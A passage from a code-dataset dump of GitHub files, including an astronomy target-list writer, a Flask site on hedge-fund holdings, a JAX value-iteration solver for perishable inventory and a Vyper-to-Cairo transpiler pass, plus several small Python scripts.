'INSTRUMENT':'VIRUS',\n 'GMAG':'22',\n 'SKYBRIGHT_G':'18.0',\n 'SEEING': '3.0',\n 'SKYTRANS': 'S',\n 'SKYCALS': 'Y',\n 'PRI':'0',\n 'SETUPMETHOD':'DirectGuider',\n 'DITHER':'Y',\n 'PMRA':'0',\n 'PMDEC':'0',\n 'COMMENT':'\"Usual Dither, look for new object in target IFU\"',\n }\n GraceID = lstfile.split('_')[1].split('.')[0]\n with open(savedir+'submission_to_HET.tsl','w') as f:\n f.write('COMMON\\n')\n for key,value in common.items():\n f.write('\\t{}\\t{}\\n'.format(key,value))\n f.write('TRACK_LIST\\n')\n f.write(' OBJECT\\tRA\\tDEC\\tPIPRI\\n')\n targets = np.loadtxt(lstfile,skiprows=1,dtype=str)\n targets = np.atleast_2d(targets)\n c = SkyCoord(ra=np.asarray(targets[:,1], dtype=float) \\\n * u.degree, dec = np.asarray(targets[:,2], \\\n dtype=float)* u.degree, frame='icrs')\n c = c.to_string('hmsdms')\n for i,target in enumerate(targets):\n \n #process ra into format:\n ra = c[i].split(' ')[0]\n hour = \"{:2.0f}\".format(float(ra[:ra.index('h')]))\n if hour[0] == ' ':\n hour = '0'+hour[1:]\n min = \"{:2.0f}\".format(float(ra[ra.index('h')+1:ra.index('m')]))\n if min[0] == ' ':\n min = '0'+min[1:]\n sec = \"{:2.2f}\".format(float(ra[ra.index('m')+1:ra.index('s')]))\n if sec[0] == ' ':\n sec = '0'+sec[1:]\n if len(sec) == 4:\n sec = '0'+sec\n ra = hour+\":\"+min+\":\"+sec\n \n #processing dec into format\n dec = c[i].split(' ')[1]\n \n pos_neg = dec[0]\n deg = \"{:2.0f}\".format(float(dec[1:dec.index('d')]))\n if deg[0] == ' ':\n deg='0'+deg[1:]\n min = \"{:2.0f}\".format(float(dec[dec.index('d')+1:dec.index('m')]))\n if min[0] == ' ':\n min='0'+min[1:]\n sec = \"{:2.2f}\".format(float(dec[dec.index('m')+1:dec.index('s')]))\n if sec[0] == ' ':\n sec = '0'+sec[1:]\n if len(sec) == 4:\n sec = '0'+sec\n dec = pos_neg+deg+\":\"+min+\":\"+sec\n f.write('Target{}\\t{}\\t{}\\t{}\\n'.format(target[0],ra,dec,str(int(target[0]))))\ndef main():\n make_phaseii(sys.argv[1])\nif __name__=='__main__':\n main()\n","repo_name":"sky5265/LIGHETR_Alert_System","sub_path":"Final Directory/make_phaseii.py","file_name":"make_phaseii.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41221114556","text":"# Pythonで英和辞書\nimport sys\ndicfile = \"ejdict-hand-utf8.txt\"\n\n# 引数をチェック\nif len(sys.argv) < 2:\n print(\"[USAGE] jisyo.py word\")\n quit()\n# 指定された単語\nword = sys.argv[1]\n\n# 辞書データを一行ずつ調べる\nwith open(dicfile, \"rt\", encoding=\"utf-8\") as fp:\n while True:\n line = fp.readline()\n if not line: break\n if word in line:\n print(line.strip())\n\n","repo_name":"kujirahand/book-rust","sub_path":"src/ch2/jisyo.py","file_name":"jisyo.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"48"} +{"seq_id":"5011637943","text":"import os\nimport unittest\nimport zipfile\nfrom tempfile import TemporaryDirectory\n\nfrom galileo.apps.repository import Repository\n\nthis_dir = os.path.join(os.path.dirname(__file__))\n\n\nclass TemporaryRepositoryResource:\n \"\"\"\n Prepares a Repository, by zipping all test apps into a temporary directory, and using that directory as root for the\n Repository.\n \"\"\"\n apps_dir = os.path.join(os.path.dirname(__file__), 'repo')\n\n tmpdir: TemporaryDirectory\n repository: Repository\n\n def setUp(self):\n self.tmpdir = TemporaryDirectory(prefix='galileo_unittest_')\n self._prepare_repo()\n\n self.repository = Repository(self.tmpdir.name)\n\n def tearDown(self):\n self.tmpdir.cleanup()\n\n def _prepare_repo(self):\n for d in os.listdir(self.apps_dir):\n\n app_dir = os.path.join(self.apps_dir, d)\n with zipfile.ZipFile(os.path.join(self.tmpdir.name, '%s.zip' % d), 'w') as zipfd:\n for root, dirs, files in os.walk(app_dir):\n for file in files:\n zipfd.write(os.path.join(root, file), file)\n\n\nclass RepositoryTest(unittest.TestCase):\n repo = TemporaryRepositoryResource()\n\n @classmethod\n def setUpClass(cls) -> None:\n cls.repo.setUp()\n\n @classmethod\n def tearDownClass(cls) -> None:\n cls.repo.tearDown()\n\n def test_list_archives(self):\n archives = self.repo.repository.list_archives()\n\n self.assertEqual(3, len(archives), 'expected three archives, got %s' % archives)\n\n names = [path.split('/')[-1] for path in archives]\n self.assertIn('testapp.zip', names)\n self.assertIn('noname.zip', names)\n self.assertIn('nomanifest.zip', names)\n\n def test_list_apps(self):\n apps = self.repo.repository.list_apps()\n self.assertEqual(1, len(apps), 'expected one app, got %s' % apps)\n\n info = apps[0]\n\n self.assertEqual('testapp', info.name)\n self.assertEqual('testapp', info.manifest['name'])\n\n def test_get_app(self):\n info = self.repo.repository.get_app('testapp')\n\n self.assertEqual('testapp', info.name)\n self.assertEqual('testapp', info.manifest['name'])\n\n def test_get_app_nonexisting_app_returns_none(self):\n info = self.repo.repository.get_app('nonexisting')\n self.assertIsNone(info)\n\n def test_get_app_invalid_app_returns_none(self):\n info = self.repo.repository.get_app('noname')\n self.assertIsNone(info)\n\n def test_get_app_without_manifestreturns_none(self):\n info = self.repo.repository.get_app('nomanifest')\n self.assertIsNone(info)\n\n def test_add_and_get(self):\n repo = self.repo.repository\n info = repo.add(os.path.join(this_dir, 'testapp2.zip'))\n\n self.assertEqual('testapp2', info.name)\n self.assertEqual({'name': 'testapp2'}, info.manifest)\n\n actual = repo.get_app('testapp2')\n self.assertEqual(info, actual)\n\n def test_add_and_remove(self):\n repo = self.repo.repository\n info = repo.add(os.path.join(this_dir, 'testapp2.zip'))\n\n self.assertTrue(os.path.isfile(info.archive_path))\n\n deleted = repo.delete_app('testapp2')\n self.assertTrue(deleted)\n\n self.assertFalse(os.path.isfile(info.archive_path))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"edgerun/galileo","sub_path":"tests/apps/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"21894190925","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 1 00:34:52 2021\r\n\r\n@author: 0526p\r\n\"\"\"\r\n\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\n\r\nroot = Tk()\r\nroot.title('Working on Tkinter')\r\n\r\n# showinfo, showwarning, showerror, askquestion, askokcancle, askyesno\r\n\r\ndef popup():\r\n response = messagebox.showinfo('This is my Popup!', 'Hello World!')\r\n# response = messagebox.showwarning('This is my Popup!', 'Hello World!')\r\n # response = messagebox.showerror('This is my Popup!', 'Hello World!')\r\n # response = messagebox.askquestion('This is my Popup!', 'Hello World!')\r\n # response = messagebox.askokcancel('This is my Popup!', 'Hello World!')\r\n #response = messagebox.askyesno('This is my Popup!', 'Hello World!')\r\n Label(root, text = response).pack()\r\n\r\nButton(root, text = 'Popup', command = popup).pack()\r\n\r\nmainloop()\r\n","repo_name":"PrinceKumarKeshri/Python-GUI-using-Tkinter","sub_path":"10 Message Box/message boxes part 1.py","file_name":"message boxes part 1.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18566763081","text":"# built-in\nimport json\n# external\nfrom flask import Flask, render_template, make_response, redirect, url_for\nfrom flask_flatpages import FlatPages\nimport pandas as pd\n# internal\nimport config\nfrom config import change_threshold, ownership_colors, positives_colors, negatives_colors\n\nFLATPAGES_AUTO_RELOAD = True\nFLATPAGES_EXTENSION = '.md'\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\npages = FlatPages(app)\n\n@app.route(\"/set\")\n@app.route(\"/set/\")\ndef set_theme(theme=\"light\"):\n res = make_response(redirect(url_for(\"index\")))\n res.set_cookie(\"theme\", theme)\n return res\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index():\n \"\"\"Creates the main page via Flask, reads tables by creating three lists from the json loaded dataframe and loads\n colors gradients from config \"\"\"\n\n with open(config.scrapped_json_fn, 'r') as f:\n json_df = json.load(f)\n df = pd.read_json(json_df, orient='split')\n try:\n ownership = df[['Company', 'Ownership', 'URL_Yahoo']\n ].dropna().head(n=20).values.tolist()\n except:\n ownership = df[['Company', 'Ownership']\n ].dropna().head(n=20).values.tolist()\n positives = df.sort_values(\n 'Change', ascending=False)[['Company', 'Change', 'URL_Yahoo']].dropna().head(n=20).values.tolist()\n negatives = df.sort_values(\n 'Change')[['Company', 'Change', 'URL_Yahoo']].dropna().head(n=20).values.tolist()\n\n # Most recent filing fund data generation\n with open(config.scrapped_json_fn_hedgefund, 'r') as f:\n hedge_fund_json_dg = json.load(f)\n df_recent_filing = pd.read_json(hedge_fund_json_dg, orient='split').T.rename(\n columns={0: 'link', 1: 'recent_filing_date', 2: 'current_holdings', 3: 'previous_holdings'})\n df_recent_filing_head = df_recent_filing[\n df_recent_filing.recent_filing_date == df_recent_filing.recent_filing_date.max()].head(1)\n most_recent_filing_date = df_recent_filing_head.recent_filing_date.tolist()[\n 0]\n most_recent_filing_url = df_recent_filing_head.link.tolist()[0]\n most_recent_filing_word_list = df_recent_filing_head.index.tolist()[\n 0].split(' ')\n max_fund_name_characters = 10\n most_recent_filing_fund = ''\n for word in most_recent_filing_word_list:\n if len(most_recent_filing_fund) < max_fund_name_characters:\n most_recent_filing_fund = most_recent_filing_fund + ' ' + word\n else:\n break\n\n return render_template('index.html',\n ownership=ownership,\n positives=positives,\n negatives=negatives,\n ownership_colors=ownership_colors,\n positives_colors=positives_colors,\n negatives_colors=negatives_colors,\n most_recent_filing_url=most_recent_filing_url,\n most_recent_filing_firm=most_recent_filing_fund,\n most_recent_filing_date=most_recent_filing_date)\n\n\n@app.route('//')\ndef page(path):\n \"\"\"Generates blog posts dynamically from markdown pages within the pages /folder\"\"\"\n page = pages.get_or_404(path)\n return render_template('page.html', page=page)\n\n\n@app.route(\"/data_byHedgeFund\", methods=['GET', 'POST'])\ndef index_by_hedgefund():\n \"\"\"Creates the data by hedge fund page\"\"\"\n\n # Most recent filing fund data generation\n with open(config.scrapped_json_fn_hedgefund, 'r') as f:\n hedge_fund_json_dg = json.load(f)\n df_recent_filing = pd.read_json(hedge_fund_json_dg, orient='split').T.rename(\n columns={0: 'link', 1: 'recent_filing_date', 2: 'current_holdings', 3: 'previous_holdings'})\n\n try:\n filings_by_fund = df_recent_filing.reset_index().rename(columns={'index': 'fund_name'})[['fund_name', 'recent_filing_date', 'current_holdings', 'previous_holdings', 'link']\n ].dropna().head(n=50).values.tolist()\n for i, fund_filing in enumerate(filings_by_fund):\n filings_by_fund_stocksOnly = [x['Company'] for x in fund_filing[2]]\n filings_by_fund[i].insert(6, filings_by_fund_stocksOnly)\n # print(filings_by_fund[0][5])\n except Exception as e:\n print('Error Pulling outt Filings by Fund', flush=True)\n print(e, flush=True)\n pass\n return render_template('index_byHedgeFund.html',\n filings_by_fund=filings_by_fund)\n\n\n@app.route(\"/shorts\", methods=['GET', 'POST'])\ndef index_shorts():\n \"\"\"Lists Options\"\"\"\n # try:\n with open(config.scrapped_json_fn_options, 'r') as f:\n hedge_fund_json_dg = json.load(f)\n df_recent_options = pd.read_json(hedge_fund_json_dg, orient='split')\n df_puts_only = df_recent_options.drop_duplicates(\n subset=['CUSIP', 'HF_Name'], keep=False)\n df_puts_only = df_puts_only[\n (df_puts_only['Option_Type'] == 'Put') & (df_puts_only['HF_Name'] != 'CAPITAL FUND MANAGEMENT')]\n # df_puts_only.sort_values('Company').reset_index().tail(100)\n df_puts_only_by_stock = df_puts_only.groupby(['CUSIP', 'Company', 'Option_Type'], as_index=False).agg(\n {'Shares': 'sum', 'Value': 'sum', 'HF_Name': 'unique'}).sort_values('Value', ascending=False)\n puts_only_by_stock = df_puts_only_by_stock[['Company', 'Option_Type', 'Shares', 'Value', 'HF_Name']\n ].dropna().head(n=75).values.tolist()\n # except Exception as e:\n # print('Error Pulling outt Options by Stock', flush=True)\n # print(e, flush=True)\n # pass\n return render_template('index_options_byStock.html',\n put_options_by_stock=puts_only_by_stock)\n\n\n@app.route(\"/blog\")\ndef blog():\n \"\"\"Generates a list of all blog posts dynamically from markdown pages within the pages /folder\"\"\"\n return render_template('blog.html',\n pages=pages)\n\n\n@app.route(\"/about\")\ndef about():\n fund_link_dictionary_list = [[key, val]\n for key, val in config.fund_dict.items()]\n return render_template('about.html',\n fund_name_link_zipped_list=fund_link_dictionary_list)\n\n\n@app.route(\"/sitemap.xml\")\ndef sitemap():\n return render_template('sitemap.xml')\n\n\n@app.route(\"/ads.txt\")\ndef ads_txt():\n return render_template('ads.txt')\n\n\nif __name__ == \"__main__\":\n app.run(threaded=True, debug=True)\n","repo_name":"whs2k/stockFries","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32125788777","text":"f = open(\"spiciesURL.txt\",\"r\")\ng = open(\"StreptococcusURL.txt\",\"w\")\nh = open(\"8genusURL.txt\",\"w\")\n\nff = f.readlines()\nnff = len(ff)\n\nfor i in range(0,nff):\n if \"-\"*10 in ff[i]:\n p = i\n\nfor i in range(0,p):\n g.write(ff[i])\nfor i in range(p+1,nff):\n h.write(ff[i])\n\n# spiciesURL에 있는 전체 URL에서, Streptococcus들의 URL은 StreptococcusURL에,\n# 다른 genus의 URL은 8genusURL에 쓰기\n\nf.close()\ng.close()\nh.close()\n","repo_name":"limchanyoung1116/probiotics-geneticfeature","sub_path":"genome/2. speciesURL/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32367646740","text":"import numpy as np\nimport pandas as pd\nimport jax\nimport jax.numpy as jnp\nimport itertools\nimport logging\nfrom viso_jax.value_iteration.base_vi_runner import ValueIterationRunner\nfrom pathlib import Path\nfrom jax import tree_util\nfrom typing import Union, Dict, Tuple, List, Optional\nimport chex\nfrom datetime import datetime\n\n# Enable logging\nlog = logging.getLogger(\"ValueIterationRunner\")\n\n# NOTE: in Hendrix et al (2019), oldest stock on LHS of inventory vector\n# Here, for consistency with De Moor and Mirjalili cases, oldest stock\n# is now on the RHS of the inventory vector\n\n\nclass HendrixPerishableOneProductVIR(ValueIterationRunner):\n def __init__(\n self,\n max_useful_life: int,\n demand_poisson_mean: float,\n variable_order_cost: float,\n sales_price: float,\n max_order_quantity: int,\n max_batch_size: int,\n epsilon: float,\n gamma: float = 1,\n output_directory: Optional[Union[str, Path]] = None,\n checkpoint_frequency: int = 0,\n resume_from_checkpoint: Union[bool, str] = False,\n ):\n\n \"\"\"Class to run value iteration for hendrix_perishable_one_product scenario\n\n Args:\n max_useful_life: maximum useful life of product, m >= 1\n demand_poission_mean: mean of Poisson distribution that models demand\n variable_order_cost: cost per unit ordered\n sales_price: revenue per unit issued to meet demand\n max_order_quantity: maximum order quantity\n max_batch_size: Maximum number of states to update in parallel using vmap, will depend on GPU memory\n epsilon: Convergence criterion for value iteration\n gamma: Discount factor\n output_directory: Directory to save output to, if None, will create a new directory\n checkpoint_frequency: Frequency with which to save checkpoints, 0 for no checkpoints\n resume_from_checkpoint: If False, start from scratch; if filename, resume from checkpoint\n\n \"\"\"\n assert (\n max_useful_life >= 1\n ), \"max_useful_life must be greater than or equal to 1\"\n self.max_useful_life = max_useful_life\n self.demand_poisson_mean = demand_poisson_mean\n self.variable_order_cost = variable_order_cost\n self.sales_price = sales_price\n self.max_order_quantity = max_order_quantity\n\n self.max_batch_size = max_batch_size\n self.epsilon = epsilon\n self.gamma = gamma\n\n if output_directory is None:\n now = datetime.now()\n date = now.strftime(\"%Y-%m-%d)\")\n time = now.strftime(\"%H-%M-%S\")\n self.output_directory = Path(f\"vi_output/{date}/{time}\").absolute()\n else:\n self.output_directory = Path(output_directory).absolute()\n\n self.checkpoint_frequency = checkpoint_frequency\n if self.checkpoint_frequency > 0:\n self.cp_path = self.output_directory / \"checkpoints\"\n self.cp_path.mkdir(parents=True, exist_ok=True)\n\n self.resume_from_checkpoint = resume_from_checkpoint\n\n self._setup()\n log.info(f\"Max order quantity: {self.max_order_quantity}\")\n\n def _setup_before_states_actions_random_outcomes_created(self):\n \"\"\"Calculate the maximum stock and maximum demand to be considered\"\"\"\n self.max_stock = self.max_order_quantity * self.max_useful_life\n self.max_demand = self.max_useful_life * (self.max_order_quantity + 2)\n\n def _setup_after_states_actions_random_outcomes_created(self):\n \"\"\"Set up functions to calculate the expected sales revenue, used\n for the initial estimate of the value function\"\"\"\n\n self._calculate_expected_sales_revenue_vmap_states = jax.vmap(\n self._calculate_expected_sales_revenue\n )\n self._calculate_expected_sales_revenue_state_batch_jit = jax.jit(\n self._calculate_expected_sales_revenue_state_batch\n )\n self._calculate_expected_sales_revenue_scan_state_batches_pmap = jax.pmap(\n self._calculate_expected_sales_revenue_scan_state_batches, in_axes=(None, 0)\n )\n\n def generate_states(self) -> Tuple[List[Tuple], Dict[str, int]]:\n \"\"\"Returns a tuple consisting of a list of all possible states as tuples and a\n dictionary that maps descriptive names of the components of the state to indices\n that can be used to extract them from an individual state\"\"\"\n states = self._generate_states_single_product(self.max_order_quantity)\n\n # Use this dict to access specific parts of the state\n state_component_idx_dict = self._generate_one_product_state_component_idx_dict()\n return states, state_component_idx_dict\n\n def create_state_to_idx_mapping(self) -> chex.Array:\n \"\"\"Returns an array that maps from a state (represented as a tuple) to its index\n in the state array\"\"\"\n state_to_idx = np.zeros(\n tuple([self.max_order_quantity + 1] * self.max_useful_life)\n )\n for idx, state in enumerate(self.state_tuples):\n state_to_idx[state] = idx\n state_to_idx = jnp.array(state_to_idx, dtype=jnp.int32)\n return state_to_idx\n\n def generate_actions(self) -> Tuple[chex.Array, List[str]]:\n \"\"\"Returns a tuple consisting of an array of all possible actions and a\n list of descriptive names for each action dimension\"\"\"\n actions = jnp.arange(0, self.max_order_quantity + 1)\n action_labels = [\"order_quantity\"]\n return actions, action_labels\n\n def generate_possible_random_outcomes(self) -> Tuple[chex.Array, Dict[str, int]]:\n \"\"\"Returns a tuple consisting of an array of all possible random outcomes and a dictionary\n that maps descriptive names of the components of a random outcome to indices that can be\n used to extract them from an individual random outcome.\"\"\"\n # The transition depends on the number of units issued\n issued = jnp.arange(0, self.max_stock + 1)\n # Use this dict to access specific elements of the random outcomes\n pro_component_idx_dict = {}\n pro_component_idx_dict[\"issued\"] = 0\n\n return issued, pro_component_idx_dict\n\n def deterministic_transition_function(\n self,\n state: chex.Array,\n action: Union[int, chex.Array],\n random_outcome: chex.Array,\n ) -> Tuple[chex.Array, float]:\n \"\"\"Returns the next state and single-step reward for the provided state, action and random combination\"\"\"\n stock_after_issue = self._issue_fifo(\n state,\n random_outcome,\n )\n\n next_state = jnp.hstack(\n [action, stock_after_issue[0 : self.max_useful_life - 1]]\n )\n\n # Pass through the random outcome (units issued)\n single_step_reward = self._calculate_single_step_reward(\n state, action, random_outcome\n )\n\n return (next_state, single_step_reward)\n\n def get_probabilities(\n self,\n state: chex.Array,\n action: Union[int, chex.Array],\n possible_random_outcomes: chex.Array,\n ) -> chex.Array:\n \"\"\"Returns an array of the probabilities of each possible random outcome for the provides state-action pair\"\"\"\n\n stock = jnp.sum(state)\n\n # Transition probabilities if demand for a less than or equal to stock\n demand_upto_max_stock = jnp.arange(0, self.max_stock + 1)\n prob_demand = jax.scipy.stats.poisson.pmf(\n jnp.arange(self.max_stock + 1), self.demand_poisson_mean\n )\n issued_probs = prob_demand * (jnp.arange(self.max_stock + 1) <= stock)\n\n # Plus component for demand greater than current stock, issue all stock\n prob_demand_gt_stock = 1 - jax.scipy.stats.poisson.cdf(\n stock, self.demand_poisson_mean\n )\n issued_probs = issued_probs.at[stock].add(prob_demand_gt_stock)\n\n return issued_probs\n\n def calculate_initial_values(self) -> chex.Array:\n \"\"\"Returns an array of the initial values for each state, based on the\n expected one step ahead sales revenue\"\"\"\n\n padded_batched_expected_sales_revenue = (\n self._calculate_expected_sales_revenue_scan_state_batches_pmap(\n None, self.padded_batched_states\n )\n )\n\n expected_sales_revenue = self._unpad(\n padded_batched_expected_sales_revenue.reshape(-1), self.n_pad\n )\n\n return expected_sales_revenue\n\n def check_converged(\n self, iteration: int, min_iter: int, V: chex.Array, V_old: chex.Array\n ) -> bool:\n \"\"\"Convergence check to determine whether to stop value iteration. This convergence check\n is testing for the convergence of the policy, and will stop value iteration\n when the values for every state are changing by approximately the same amount.\"\"\"\n delta = V - V_old\n max_delta = jnp.max(delta)\n min_delta = jnp.min(delta)\n delta_diff = max_delta - min_delta\n if delta_diff < self.epsilon:\n if iteration >= min_iter:\n log.info(f\"Converged on iteration {iteration}\")\n log.info(f\"Max delta: {max_delta}\")\n log.info(f\"Min delta: {min_delta}\")\n return True\n else:\n log.info(\n f\"Difference below epsilon on iteration {iteration}, but min iterations not reached\"\n )\n return False\n else:\n log.info(f\"Iteration {iteration}, delta diff: {delta_diff}\")\n return False\n\n ### Supporting functions for self.generate_states() ###\n def _generate_states_single_product(self, max_order_quantity: int) -> List[Tuple]:\n \"\"\"Returns possible states, as a list of tuples\"\"\"\n possible_orders = range(0, max_order_quantity + 1)\n product_arg = [possible_orders] * self.max_useful_life\n return list(itertools.product(*product_arg))\n\n def _generate_one_product_state_component_idx_dict(self) -> Dict[str, int]:\n \"\"\"Returns a dictionary that maps descriptive names of the components of a state\n to indices of the elements in the state array\"\"\"\n state_component_idx_dict = {}\n state_component_idx_dict[\"stock_start\"] = 0\n state_component_idx_dict[\"stock_len\"] = self.max_useful_life\n state_component_idx_dict[\"stock_stop\"] = (\n state_component_idx_dict[\"stock_start\"]\n + state_component_idx_dict[\"stock_len\"]\n )\n return state_component_idx_dict\n\n ### Supporting functions for self.deterministic_transition_function() ###\n def _issue_fifo(self, opening_stock: chex.Array, demand: int) -> chex.Array:\n \"\"\"Issue stock using FIFO policy\"\"\"\n # Oldest stock on RHS of vector, so reverse\n _, remaining_stock = jax.lax.scan(\n self._issue_one_step, demand, opening_stock, reverse=True\n )\n return remaining_stock\n\n def _issue_one_step(\n self, remaining_demand: chex.Array, stock_element: int\n ) -> Tuple[int, int]:\n \"\"\"Fill demand with stock of one age, representing one element in the state\"\"\"\n remaining_stock = (stock_element - remaining_demand).clip(0)\n remaining_demand = (remaining_demand - stock_element).clip(0)\n return remaining_demand, remaining_stock\n\n def _calculate_single_step_reward(\n self,\n state: chex.Array,\n action: Union[int, chex.Array],\n transition_function_reward_output: chex.Array,\n ) -> float:\n \"\"\"Calculate the single step reward based on the provided state, action and\n output from the transition function\"\"\"\n cost = action * self.variable_order_cost\n revenue = transition_function_reward_output * self.sales_price\n return revenue - cost\n\n ##### Support functions for self._calculate_single_step_reward() #####\n def _calculate_sales_revenue_for_possible_random_outcomes(self) -> chex.Array:\n \"\"\"Calculate the sales revenue for each possible random outcome of demand\"\"\"\n return self.possible_random_outcomes * self.sales_price\n\n def _calculate_expected_sales_revenue(self, state: chex.Array) -> float:\n \"\"\"Calculate the expected sales revenue for a given state\"\"\"\n issued_probabilities = self.get_probabilities(state, None, None)\n expected_sales_revenue = issued_probabilities.dot(\n self._calculate_sales_revenue_for_possible_random_outcomes()\n )\n return expected_sales_revenue\n\n def _calculate_expected_sales_revenue_state_batch(\n self, carry: None, batch_of_states: chex.Array\n ) -> Tuple[None, chex.Array]:\n \"\"\"Calculate the expected sales revenue for a batch of states\"\"\"\n revenue = self._calculate_expected_sales_revenue_vmap_states(batch_of_states)\n return carry, revenue\n\n def _calculate_expected_sales_revenue_scan_state_batches(\n self, carry: None, padded_batched_states: chex.Array\n ) -> chex.Array:\n \"\"\"Calculate the expected sales revenue for multiple batches of states, using jax.lax.scan to loop over the batches of states\"\"\"\n carry, revenue_padded = jax.lax.scan(\n self._calculate_expected_sales_revenue_state_batch_jit,\n carry,\n padded_batched_states,\n )\n return revenue_padded\n\n ### Utility functions to set up pytree for class ###\n # See https://jax.readthedocs.io/en/latest/faq.html#strategy-3-making-customclass-a-pytree\n\n def _tree_flatten(self):\n children = (\n self.state_to_idx_mapping,\n self.states,\n self.padded_batched_states,\n self.actions,\n self.possible_random_outcomes,\n self.V_old,\n self.iteration,\n ) # arrays / dynamic values\n aux_data = {\n \"max_useful_life\": self.max_useful_life,\n \"demand_poisson_mean\": self.demand_poisson_mean,\n \"variable_order_cost\": self.variable_order_cost,\n \"sales_price\": self.sales_price,\n \"max_order_quantity\": self.max_order_quantity,\n \"batch_size\": self.batch_size,\n \"max_batch_size\": self.max_batch_size,\n \"n_devices\": self.n_devices,\n \"epsilon\": self.epsilon,\n \"gamma\": self.gamma,\n \"checkpoint_frequency\": self.checkpoint_frequency,\n \"cp_path\": self.cp_path,\n \"resume_from_checkpoint\": self.resume_from_checkpoint,\n \"max_stock\": self.max_stock,\n \"max_demand\": self.max_demand,\n \"state_tuples\": self.state_tuples,\n \"action_labels\": self.action_labels,\n \"state_component_idx_dict\": self.state_component_idx_dict,\n \"pro_component_idx_dict\": self.pro_component_idx_dict,\n \"n_pad\": self.n_pad,\n \"output_info\": self.output_info,\n } # static values\n return (children, aux_data)\n\n\ntree_util.register_pytree_node(\n HendrixPerishableOneProductVIR,\n HendrixPerishableOneProductVIR._tree_flatten,\n HendrixPerishableOneProductVIR._tree_unflatten,\n)\n","repo_name":"joefarrington/viso_jax","sub_path":"viso_jax/scenarios/hendrix_perishable_one_product/vi_runner.py","file_name":"vi_runner.py","file_ext":"py","file_size_in_byte":15187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31811699145","text":"import requests\n\nclass APIClient(object):\n def __init__(self, timeout=10):\n self.timeout = timeout\n self.session = requests.Session()\n\n def get(self, url, params=None, headers=None):\n try:\n response = self.session.get(url, params=params, headers=headers, timeout=self.timeout)\n response.raise_for_status() # 检查响应状态码,如果不是 2xx,抛出异常\n return response\n except requests.RequestException as e:\n print(f\"请求发生异常: {e}\")\n raise\n\n def post(self, url, data=None, headers=None):\n try:\n response = self.session.post(url, json=data, headers=headers, timeout=self.timeout)\n response.raise_for_status() # 检查响应状态码,如果不是 2xx,抛出异常\n return response\n except requests.RequestException as e:\n print(f\"请求发生异常: {e}\")\n raise\n# url = \"https://fanyi-api.baidu.com/api/trans/vip/translate\"\n# url = \"https://fanyi-api.baidu.com/api/trans/vip/translate?q=test&from=en&to=zh&appid=20210103000662374&salt=555&sign=6920f89156766aece32ac15afcd6ff3b\"\n#\n# params = {\n# \"q\": \"test\",\n# \"from\": \"en\",\n# \"to\": \"zh\",\n# \"appid\": \"20210103000662374\",\n# \"salt\": \"1435660288\",\n# \"sign\": \"6920f89156766aece32ac15afcd6ff3b\"\n# }\n#\n# p = APIClient()\n# print(p.get(url).text)","repo_name":"dandanyang123/AutoTest-api-app-web","sub_path":"Common/BaseApi.py","file_name":"BaseApi.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31308077265","text":"from vyper import ast as vy_ast\n\nfrom vyro.cairo.import_directives import add_builtin_to_module\nfrom vyro.cairo.nodes import CairoIfTest\nfrom vyro.cairo.types import FeltDefinition\nfrom vyro.transpiler.context import ASTContext\nfrom vyro.transpiler.utils import (\n create_assign_node,\n create_name_node,\n get_scope,\n insert_statement_before,\n set_parent,\n)\nfrom vyro.transpiler.visitor import BaseVisitor\n\n\nclass IfHandlerVisitor(BaseVisitor):\n def visit_FunctionDef(self, node: vy_ast.FunctionDef, ast: vy_ast.Module, context: ASTContext):\n # Extract `If` nodes to prevent infinite loop\n if_nodes = node.get_descendants(vy_ast.If)\n for if_node in if_nodes:\n self.visit_If(if_node, ast, context)\n\n def visit_If(self, node: vy_ast.If, ast: vy_ast.Module, context: ASTContext):\n\n # Assign test condition to a temporary variable in an `Assign` statement\n # before `If` node\n condition = node.test\n node._children.remove(node.test)\n\n temp_name_node = create_name_node(context)\n temp_name_node._metadata[\"type\"] = FeltDefinition()\n\n assign_condition_node = create_assign_node(context, [temp_name_node], condition)\n\n scope_node, scope_node_body = get_scope(node)\n insert_statement_before(assign_condition_node, node, scope_node, scope_node_body)\n\n # Replace 'test' for `If` node with `CairoIfTest` of temporary variable to TRUE\n temp_name_node_dup = create_name_node(context, name=temp_name_node.id)\n temp_name_node_dup._metadata[\"type\"] = FeltDefinition()\n\n true_constant_node = create_name_node(context, name=\"TRUE\")\n true_constant_node._metadata[\"type\"] = FeltDefinition()\n add_builtin_to_module(ast, \"TRUE\")\n\n compare_node = CairoIfTest(\n node_id=context.reserve_id(),\n ops=[vy_ast.Eq()],\n left=temp_name_node_dup,\n comparators=[true_constant_node],\n ast_type=\"Compare\",\n )\n set_parent(temp_name_node_dup, compare_node)\n set_parent(true_constant_node, compare_node)\n\n node.test = compare_node\n set_parent(compare_node, node)\n","repo_name":"tserg/vyro","sub_path":"vyro/transpiler/passes/if_handler.py","file_name":"if_handler.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"31103128790","text":"#!/usr/bin/env python\nimport roslib\nimport sys\nimport rospy\nimport rospkg\nfrom geometry_msgs.msg import PoseStamped\nfrom rospy.impl import init\n\nfrom image_tools import getGSD\nfrom 